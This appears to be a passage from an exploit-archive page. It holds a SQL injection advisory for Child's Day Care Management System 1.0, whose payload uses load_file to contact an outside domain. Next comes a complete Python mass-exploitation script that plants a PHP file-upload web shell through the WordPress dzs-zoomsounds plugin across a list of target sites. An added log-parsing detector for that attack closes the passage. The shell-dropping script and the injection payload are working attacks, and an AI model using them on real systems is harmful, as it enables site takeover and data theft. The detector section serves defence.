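    return False
```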
<pre><code>## Title: Child's Day Care Management System 1.0 - SQL Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` parameter of Login.php in Child's Day Care Management System 1.0 appears to be vulnerable to SQL injection.<br />The payload '+(select load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC path pointing at an external domain.<br />The application interacted with that domain, indicating that the injected SQL query was executed.<br />The system is also vulnerable to authentication bypass via SQL injection and to stored XSS.<br />An attacker can extract all information held by the system through these vulnerabilities.
Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset=True)<br />fr = Fore.RED<br />gr = Fore.BLUE<br />fc = Fore.CYAN<br />fw = Fore.WHITE<br />fy = Fore.YELLOW<br />fg = Fore.GREEN<br />sd = Style.DIM<br />sn = Style.NORMAL<br />sb = Style.BRIGHT<br />Bad = 0<br />Good = 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder("exploited")<br />def clear():<br /> try:<br /> if os.name == 'nt':<br /> os.system('cls')<br /> else:<br /> os.system('clear')<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}<br /> try :<br /> x = requests.session()<br /> listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']<br /> for script in listaa :<br /> url = (i+"/"+script)<br /> while True :<br /> req_first = x.get(url, headers=head)<br /> if "error:http raw post data does not exist" in req_first.text :<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}<br 
/> burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"<br /> requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)<br /> urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")<br /> req_second = x.get(urlx, headers=head)<br /> if "Overthinker1877" in req_second.text :<br /> Good = Good + 1<br /> print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)<br /> with open("exploited/shell.txt","a") as file :<br /> file.write(urlx+"\n")<br /> file.close()<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name == 'nt':<br /> ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))<br /> else :<br /> sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))<br /><br />def key_logo():<br /> clear = '\x1b[0m'<br /> colors = [36, 32, 34, 35, 31, 37]<br /> x = ' [ + ] OVERTHINKER1877 EXPLOIT'<br /> for N, line in enumerate(x.split('\n')):<br /> sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(""" <br /> [-] -----------------------------------------[-]<br /> [+] WwW.1877.TeaM<br /> [-] -----------------------------------------[-]<br /> \n \n""")<br /> file_name = input("Website List : ")<br /> op = open(file_name,'r').read().splitlines()<br /> 
TEXTList = [list.strip() for list in op]<br /> p = Pool(int(input('Thread : ')))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>
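From the defender's side, the script above leaves a distinctive two-step trace in the web server log: a request to savepng.php whose location parameter names a .php file, followed by a 200 for that file under the plugin directory. The Python detector below is an added example (not part of the advisory) that runs this logic over constructed sample lines in combined log format; note that the script builds its URLs with a doubled slash, so paths are normalised before matching.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in combined log format; not taken from any real server.
# The first three mirror the script above, which builds its URLs with a doubled slash.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Feb/2022:10:01:02 +0000] "GET //wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Feb/2022:10:01:03 +0000] "POST //wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Feb/2022:10:01:04 +0000] "GET //wp-content/plugins/dzs-zoomsounds/1877.php HTTP/1.1" 200 350 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Feb/2022:10:05:00 +0000] "GET /wp-content/plugins/dzs-zoomsounds/savepng.php?location=cover.png HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Feb/2022:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

PLUGIN_DIR = "/wp-content/plugins/dzs-zoomsounds/"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Extensions the web server would execute if written under the plugin directory.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def detect_zoomsounds_abuse(log_text):
    """Return (severity, ip, detail) findings: 'high' for a savepng.php request whose
    location names an executable file, 'critical' when that file is later served 200."""
    findings = []
    pending = {}  # (ip, filename) -> timestamp of the last write attempt
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, status = m["ip"], m["ts"], m["status"]
        raw_path, _, query = m["target"].partition("?")
        path = re.sub(r"/+", "/", unquote(raw_path))   # collapse "//wp-content" etc.
        name = path.rsplit("/", 1)[-1]
        if path == PLUGIN_DIR + "savepng.php":
            location = parse_qs(query).get("location", [""])[0]
            target_name = location.replace("\\", "/").rsplit("/", 1)[-1]
            if EXEC_EXT.search(target_name):
                findings.append(("high", ip, f"savepng.php asked to write {target_name!r} at {ts}"))
                pending[(ip, target_name)] = ts
        elif path.startswith(PLUGIN_DIR) and status == "200" and (ip, name) in pending:
            findings.append(("critical", ip, f"{path} served 200 after write attempt at {pending[(ip, name)]}"))
    return findings
```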